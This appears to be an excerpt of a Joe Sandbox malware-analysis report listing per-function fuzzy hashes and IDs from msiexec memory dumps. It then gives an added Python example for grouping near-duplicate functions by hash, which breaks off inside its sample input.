• Instruction ID: d462641e5aa5a9c83af842f6f0be4e1599f0edbc652c1d539a212f8f91bb34d9
• Opcode Fuzzy Hash: c1eff4dd01b65723b0c400a6ad93e7bafcd2daaeae9669f32f5960479970e7b3
• Instruction Fuzzy Hash: DB218135A001199FCB15DF34C5419EE7BA5FB99360F108529D8199B258DB30EE82CBE1

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c9cf390aa03da1e4a23329cc5cce07747bb880589243f8ca3d915445785c2ae
• Instruction ID: 880745b53c78a6bbaf7b1bed587e4d941c9db80f61f94f22e2e0a2eefbd4959c
• Opcode Fuzzy Hash: 1c9cf390aa03da1e4a23329cc5cce07747bb880589243f8ca3d915445785c2ae
• Instruction Fuzzy Hash: D821F6393056118FC7255A29C46897EBBE2FFC97517248939E806CB394CF39EC028B80

Memory Dump Source
• Source File: 00000005.00000002.3267133011.000000000058D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0058D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_58d000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4519b1dcf4b5c7bcb230b191387231ed332ea45628e59df25e726882d14a6bf8
• Instruction ID: abf44d3e980dc23eb2faf881f64420f2b29e9d41c057d5bb9202d33f2af76aa6
• Opcode Fuzzy Hash: 4519b1dcf4b5c7bcb230b191387231ed332ea45628e59df25e726882d14a6bf8
• Instruction Fuzzy Hash: 3F21D071604204EFCB14EF24C988B26BFB5FB84314F24C969ED495B292D73AD846DB72

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c56d1434b9026ad6e02f6632944ecb21721641f970775f013551ae699e926d21
• Instruction ID: 209aa2c9eaaf635989ceb3590970267e97504ebc714772fc7ab0b35c0096e846
• Opcode Fuzzy Hash: c56d1434b9026ad6e02f6632944ecb21721641f970775f013551ae699e926d21
• Instruction Fuzzy Hash: 4821AE31605509DFCF189F68D4897AE3BA2FB98351F108429F8098B244DB79DE51EBA0

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c4df47e0ee13624970096d9aef416eb7e53534e60f3ec7e9a9b56b1e5ec0a50a
• Instruction ID: 5c376c005da383a9b2e34877f48d040c9f153e355a2cd162181d0358c64d07f9
• Opcode Fuzzy Hash: c4df47e0ee13624970096d9aef416eb7e53534e60f3ec7e9a9b56b1e5ec0a50a
• Instruction Fuzzy Hash: 511108353056119FC7295A2EC46897E7BE6FFC57A17184878E806CB360CF39EC028B90

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cdfc32b2de8de0bb4ff36ff8be404afe78bd356051a381f0ab9fa894f9bb1245
• Instruction ID: 86c0e8839eaf203a89d64dbc3bfbae685201a64012ef5a0cd9194f55c22c8f23
• Opcode Fuzzy Hash: cdfc32b2de8de0bb4ff36ff8be404afe78bd356051a381f0ab9fa894f9bb1245
• Instruction Fuzzy Hash: 9C21CF78D0420A8FCB00DFA9C9456EEBFF4FF09310F10566AD819B2220EB345A95CFA1

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3d56c13eda749571009c1d5b8f7915c39e8e5353d9a3ffe2724c41fc781a394
• Instruction ID: cb2574338f9933b1ccf6762c4e81137b596e0eb46737ad5fb2383bb7554158f6
• Opcode Fuzzy Hash: d3d56c13eda749571009c1d5b8f7915c39e8e5353d9a3ffe2724c41fc781a394
• Instruction Fuzzy Hash: BA1184B0D001099FCB05DFA8D94568EBFF5FF40304F50C5A9C4089B269E7349A09DF81

Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e10967ee207c327377e9e312793d7f6d9d51aa842e3565330b249ff1e1014be8
• Instruction ID: 88f2ef77ecb4bfac7ee0910e1e0b470336c795858f886dd14702ee10d0096cba
                                                                              • Opcode Fuzzy Hash: e10967ee207c327377e9e312793d7f6d9d51aa842e3565330b249ff1e1014be8
                                                                              • Instruction Fuzzy Hash: C201DF32740515AFCB25CE589814AFE3FABFBC87A0F148029F405C7284DE36DE16A790
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 562fb2ddf87660ab69a76cc1890bebcf495decff2ee4dd2670d33b3369ce09aa
                                                                              • Instruction ID: 4f2da3829ff2e2207f17c4922da7e7d1e86c6be287d8e5f5e442044d571917ba
                                                                              • Opcode Fuzzy Hash: 562fb2ddf87660ab69a76cc1890bebcf495decff2ee4dd2670d33b3369ce09aa
                                                                              • Instruction Fuzzy Hash: 5A015E75E4021DAFCB549F78C8589AE7BB5FF89310F404479EE1A93240EB348911CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5598d92f9cf9f5415fa456578801fb4b9a1c70e1674b26101c292745af51fcdf
                                                                              • Instruction ID: 6a7695d1fba49d1288646a96e85b2777912c124dcdc267e7aef9b0ec57e92883
                                                                              • Opcode Fuzzy Hash: 5598d92f9cf9f5415fa456578801fb4b9a1c70e1674b26101c292745af51fcdf
                                                                              • Instruction Fuzzy Hash: 0001DFB2E40208EFCB14DFA8C8449EE7BB5FF88320B004079EA1993240DB308D51CFA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f6f0594213be3b6a24be5b73b0ffd5082bf1901bf2864b9b9d7bc865d446f86e
                                                                              • Instruction ID: 8a7c73f0e7005e5d44f7ecbabb400cc43be1ba49b86a0024d5e7b14e5191552b
                                                                              • Opcode Fuzzy Hash: f6f0594213be3b6a24be5b73b0ffd5082bf1901bf2864b9b9d7bc865d446f86e
                                                                              • Instruction Fuzzy Hash: 04F0AF3AB041649FCB095AB494184AE3FB6ABDA322B1540AAE60AC7391DA398C438754
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b092e75bd02ec2a4c71a938a897ff2ebf787326ed4df224348f859c973ff33e9
                                                                              • Instruction ID: 4dfa9fa02518ca548293e414118c368106f72d36168ec74c487486c90ac03dfb
                                                                              • Opcode Fuzzy Hash: b092e75bd02ec2a4c71a938a897ff2ebf787326ed4df224348f859c973ff33e9
                                                                              • Instruction Fuzzy Hash: 0DF06272E102099E8B50DFAAD841AAFFFF9FF88350705452AE905D3211D73059168BA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4586ddb833bcd9764b4cd20f37f7ac44567e18137db3ca5f85506abdddabf98
                                                                              • Instruction ID: 2e902bfc2d6cf0a67c03384667114a9c66e7f780552251ac44605cb1c244456b
                                                                              • Opcode Fuzzy Hash: a4586ddb833bcd9764b4cd20f37f7ac44567e18137db3ca5f85506abdddabf98
                                                                              • Instruction Fuzzy Hash: A8F03A353001059FC700CF6AC484C5ABBFAFF897207548069E60987332CB719C51CB80
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae12cda09b3510d1d1630c5759763ca95b42fb0fa1a391e0a3c1c48f8b926c3e
                                                                              • Instruction ID: 924e473038fcf28a08c53d097c25cdee61fe0583cc65dfd61461989c05226a12
                                                                              • Opcode Fuzzy Hash: ae12cda09b3510d1d1630c5759763ca95b42fb0fa1a391e0a3c1c48f8b926c3e
                                                                              • Instruction Fuzzy Hash: 9EE0C97A740104AFCB10CE84DC41FDDBBB2FB8C711F244156FA11A72A0C632A825DB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83dc0b8fa841e34ec2518a2aac650cf235479726a3b32d6b350f9331dc3594a0
                                                                              • Instruction ID: abe0d539bdd350f02f572a56405242d6caece130a91899ba2cdc6af8340b7287
                                                                              • Opcode Fuzzy Hash: 83dc0b8fa841e34ec2518a2aac650cf235479726a3b32d6b350f9331dc3594a0
                                                                              • Instruction Fuzzy Hash: DFD05B31D2022B57CB01E7A5DC044EFF738EED6261B544666D51437154FB702659C6E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78a2e7fd9c335879c3c8a60aef9d68213294d68b7ff9dc674aba007daa3ac4c8
                                                                              • Instruction ID: 8c3da5b71bbd39e7365ba6f6005acc74fef0b3912d7eeda7fced4fd02000942e
                                                                              • Opcode Fuzzy Hash: 78a2e7fd9c335879c3c8a60aef9d68213294d68b7ff9dc674aba007daa3ac4c8
                                                                              • Instruction Fuzzy Hash: 85E0C232D2062686CB01EBA0EC000EEB334EE82221B588627C92136151EB301669C7D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1fb005aa1780d458aa068a10200d7809010eb874d2ef98cf67c53a6836493d2
                                                                              • Instruction ID: 30f8d98b6adfefad0d48e87160bfb8c0ca4cd7bb1bdcfa331a9d82bb026c1dc4
                                                                              • Opcode Fuzzy Hash: b1fb005aa1780d458aa068a10200d7809010eb874d2ef98cf67c53a6836493d2
                                                                              • Instruction Fuzzy Hash: D6D0C7367441286B4B151A49D4058AE7B7EDBC97717448066F90983300CE754D1197D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fcd57497b82d476be1c19d2462b4b346fe281d4c0f4bbbbd25b7adf49b6610a
                                                                              • Instruction ID: 74ff1853168c58974383c45aa00a4ed6bff3f6691699d806ffa97347265b2d34
                                                                              • Opcode Fuzzy Hash: 5fcd57497b82d476be1c19d2462b4b346fe281d4c0f4bbbbd25b7adf49b6610a
                                                                              • Instruction Fuzzy Hash: 3AD05E314D03065FC705AF28E98A8683F6EFBC0322B10C724A5050955FDF79854A9B40
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 82d7f02203f53baf238d082bcff933dd5ae4a507889e150ac42d6e5120c57e1b
                                                                              • Instruction ID: 1674b37e9f1d943b93a826937c92489b49efa72696ec6e41a5520e751a979464
                                                                              • Opcode Fuzzy Hash: 82d7f02203f53baf238d082bcff933dd5ae4a507889e150ac42d6e5120c57e1b
                                                                              • Instruction Fuzzy Hash: 09D0677AB400189FCF15DF98E8508DDFB76FB98221B048117E915A3261C6319925DB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a8c57661ee46c344cc831266b125e0f06ee54c4bf93b5350a03693e4aef7544c
                                                                              • Instruction ID: 479ab635a201ecda22a8865cd77b18c833163f2eabd1902b334f1b82bd8fbfa5
                                                                              • Opcode Fuzzy Hash: a8c57661ee46c344cc831266b125e0f06ee54c4bf93b5350a03693e4aef7544c
                                                                              • Instruction Fuzzy Hash: 63D0C97A741110CFC314DB69E455C99BB75FF9922632855BFE202CB732C676C805CB20
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a194125d128f651f11fb95dbdd789ee2fc1fc4ee4fd1205150fadbb01826368d
                                                                              • Instruction ID: 60c7776450451962d6ecd7d847a98a82dd0802eb9fbe80062b10c0167919a4a8
                                                                              • Opcode Fuzzy Hash: a194125d128f651f11fb95dbdd789ee2fc1fc4ee4fd1205150fadbb01826368d
                                                                              • Instruction Fuzzy Hash: DFC012300C03094FC605FB69ED4AD553B1EBAC0305B508A20A5090955DDF7C994D9790
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (ojq$(ojq$(ojq$,nq$,nq
                                                                              • API String ID: 0-954490635
                                                                              • Opcode ID: a530a8e94c9f4d5332876a64b62ec6e95834f01ba3a217f80ba584e435c64799
                                                                              • Instruction ID: 6c83d2f5e8d360b95987721fbb6011c64bb33a58fbdf9a04edfeab21705269c9
                                                                              • Opcode Fuzzy Hash: a530a8e94c9f4d5332876a64b62ec6e95834f01ba3a217f80ba584e435c64799
                                                                              • Instruction Fuzzy Hash: B5F10870A081199FCB25CF69C984AEDBFF6BF88311F658469E805AB3A1D730ED41DB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 92cd75963871ecb4026aaf44a266278fa51de13a13a59e001b2349d4ac6c1ee4
                                                                              • Instruction ID: 9e62309e89615dd09ed9680e4c552047ca5228adde4d0e49a31be4a9df0a443d
                                                                              • Opcode Fuzzy Hash: 92cd75963871ecb4026aaf44a266278fa51de13a13a59e001b2349d4ac6c1ee4
                                                                              • Instruction Fuzzy Hash: 7952AA74E01228CFDB64DF69C984B9DBBB2BB88300F1085E9D809A7255DB359E85CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e7fb1eada882354ac560070acb74afef1b8241df732055fb28dcc7ed845195f5
                                                                              • Instruction ID: 5f95cdb73c24c1502f3bf2517cecd73ca40895bde7c0d00314901a0878e990d3
                                                                              • Opcode Fuzzy Hash: e7fb1eada882354ac560070acb74afef1b8241df732055fb28dcc7ed845195f5
                                                                              • Instruction Fuzzy Hash: F7C1B074E00218CFEB14DFA5C954B9DBBB6FF89300F2081A9D808AB369DB355A85CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db1e128bd2f306f1b334fd16c30601d5296ed8e5293df9ce7024432aa0d3fb10
                                                                              • Instruction ID: 428ae824fd1b1da90e5e6e8874b2f9a8c5d6bd96115f9087c4598f90877a646d
                                                                              • Opcode Fuzzy Hash: db1e128bd2f306f1b334fd16c30601d5296ed8e5293df9ce7024432aa0d3fb10
                                                                              • Instruction Fuzzy Hash: 65C1B274E00218CFDB14DFA5C954B9DBBB6FF89300F1081A9D809AB3A9DB355A85CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
• Opcode ID: 53ac27bb76c724cc30f08684ef6e28d233b734b7b1ac5bab6646daca6bac71ab
• Instruction ID: 15f7592b38a40bba33917e5310659c0421767383d8872b6f9b442c522fba0174
• Opcode Fuzzy Hash: 53ac27bb76c724cc30f08684ef6e28d233b734b7b1ac5bab6646daca6bac71ab
• Instruction Fuzzy Hash: 02C1B174E01218CFDB14DFA5C994B9DBBB6FF89300F2081A9D809AB369DB345A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b127d6edc7599e4ca506de698b72a896488f9370181cff378c3f4c8c1c0b52e
• Instruction ID: 3a84fbd2179e663708fb6506867b0fb92b193e625a9f52ed186600b90fae3e73
• Opcode Fuzzy Hash: 5b127d6edc7599e4ca506de698b72a896488f9370181cff378c3f4c8c1c0b52e
• Instruction Fuzzy Hash: 34C1B174E00218CFDB14DFA9C954B9DBBB6FF89300F1085A9D808AB3A9DB355A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1dc22eb6bd3368d15f13432a250a7883395bca666672a2f4acb164a7910d6de6
• Instruction ID: b1d96074d3011039c88756ae016867b0981acd1bcb273d2e76f845e60e104d22
• Opcode Fuzzy Hash: 1dc22eb6bd3368d15f13432a250a7883395bca666672a2f4acb164a7910d6de6
• Instruction Fuzzy Hash: 3DC1B2B4E01218CFDB14DFA5C994B9DBBB6FF89300F1081A9D809AB399DB355A85CF10
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c2ca6cbe4e2129c54ee564587a33a85bba37d821e8feec548cfcd0b40f0fffc
• Instruction ID: 385874877d55559f716ded5e3b21e6fb103fac33c0504c58ef41dfd1a4a9c8bb
• Opcode Fuzzy Hash: 6c2ca6cbe4e2129c54ee564587a33a85bba37d821e8feec548cfcd0b40f0fffc
• Instruction Fuzzy Hash: 53C1A174E00218CFEB14DFA5C994B9DBBB6FF89300F1085A9D809AB369DB355A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8ed3b676bd35f19d30fa611fa9d32efc2d78fad87d905773fbe8da669927071e
• Instruction ID: 2e713deaf68d611a3f600b7db98a5964af76b17bac1c45f7297b701bb80e0fb6
• Opcode Fuzzy Hash: 8ed3b676bd35f19d30fa611fa9d32efc2d78fad87d905773fbe8da669927071e
• Instruction Fuzzy Hash: 93C1A0B4E01218CFDB14DFA5C954B9DBBB6FF89300F1085A9D808AB369DB355A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82653b221be958dcb90cfe6fc261e471b4b0b123e286ae1896f6a5b788b2642c
• Instruction ID: e15489954147acd79276eba4ba7788a5b76aca1f9809d322d7e9c378bf5f3fb6
• Opcode Fuzzy Hash: 82653b221be958dcb90cfe6fc261e471b4b0b123e286ae1896f6a5b788b2642c
• Instruction Fuzzy Hash: C1C1A174E00218CFEB14DFA5C994B9DBBB6FF89300F1085A9D808AB369DB355A85CF10
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9b5e508a979f747ea1c2e01ce599d0e29c818d9da1a92a7649ecfb449d11c185
• Instruction ID: 11e98853319404d9fde969c3481d44bde6ae167c715a0de573971521426c1f88
• Opcode Fuzzy Hash: 9b5e508a979f747ea1c2e01ce599d0e29c818d9da1a92a7649ecfb449d11c185
• Instruction Fuzzy Hash: DCC1B174E00218CFDB14DFA5C994B9DBBB6FF89300F2081A9D809AB369DB355A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4bfc35acda38d573640761d7073f407cbdd7700181e2904a8ddefefb4d83be2
• Instruction ID: 7b7a0e12f7b4e07b0b1991298b9d0908ee1eebe63e79469cc3e1e61fcdf048ab
• Opcode Fuzzy Hash: d4bfc35acda38d573640761d7073f407cbdd7700181e2904a8ddefefb4d83be2
• Instruction Fuzzy Hash: 6EC1A0B4E00218CFEB14DFA5C954B9DBBB6FF89300F1085A9D809AB369DB355A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8726df74d0ed1980399ecc2a39ec012141d158fc0ef41cce86ae81a7a7600c26
• Instruction ID: 08f6d9553442e6b9d38cca30e5082da55f5f9fc4adef793352baab7b01e1aadd
• Opcode Fuzzy Hash: 8726df74d0ed1980399ecc2a39ec012141d158fc0ef41cce86ae81a7a7600c26
• Instruction Fuzzy Hash: 4CC1A174E00218CFEB14DFA5C954B9DBBB6FF89300F2085A9D809AB369DB355A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c19014ec179cf018dccd7da698fb2f11190f7963bb9a0f8dbd6338b968585b8
• Instruction ID: 210d94c6f84bcecd9d9caba09456c2c97a28c88f99b396c9b50be05f1ead6f03
• Opcode Fuzzy Hash: 3c19014ec179cf018dccd7da698fb2f11190f7963bb9a0f8dbd6338b968585b8
• Instruction Fuzzy Hash: 23A19D74A01228CFDB65DF24C954BDABBB2BF89300F5085EAD80DA7254DB359E81CF51
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de80657afbb86bc2ede1ab3855966f877c55c50c3560cd8800ed07b9768dd295
• Instruction ID: 7d083157f94b389f6000173c43ec6cf14dcc741f934c8bb08fd6b77278cc3e7a
• Opcode Fuzzy Hash: de80657afbb86bc2ede1ab3855966f877c55c50c3560cd8800ed07b9768dd295
• Instruction Fuzzy Hash: 01519E74A41228CFCB65DF24C954B9ABBB2FF4A301F5085E9D809A7364DB359E81CF50
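The run of functions above all come from the same non-PE-backed region (offset 24970000 in the msiexec dump of this analysis), carry no API ID or String ID, and have Instruction Fuzzy Hashes that differ from one another in only a handful of hex nibbles. When a dump is full of such functions the fuzzy hash is the only similarity handle the report gives you. The following Python is an added example, not part of the Joe Sandbox report or of Joe Sandbox's tooling: it parses records in the layout shown on this page and groups near-duplicate functions. The sample input is copied from five of the records on this page; comparing hashes by nibble-wise Hamming distance, and the threshold of 12 nibbles, are assumptions of this example and are not Joe Sandbox's own similarity scoring.

```python
"""Parse Joe Sandbox per-function similarity records and group near-duplicate
functions by Instruction Fuzzy Hash.

Added example, not part of the Joe Sandbox report.  The record layout follows
the report text.  Nibble-wise Hamming distance and the clustering threshold
are this example's own assumptions, not Joe Sandbox's similarity metric.
"""
import re
from dataclasses import dataclass
from itertools import combinations

# Constructed sample input: five records copied from the report page.
SAMPLE = r"""
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b127d6edc7599e4ca506de698b72a896488f9370181cff378c3f4c8c1c0b52e
• Instruction ID: 3a84fbd2179e663708fb6506867b0fb92b193e625a9f52ed186600b90fae3e73
• Opcode Fuzzy Hash: 5b127d6edc7599e4ca506de698b72a896488f9370181cff378c3f4c8c1c0b52e
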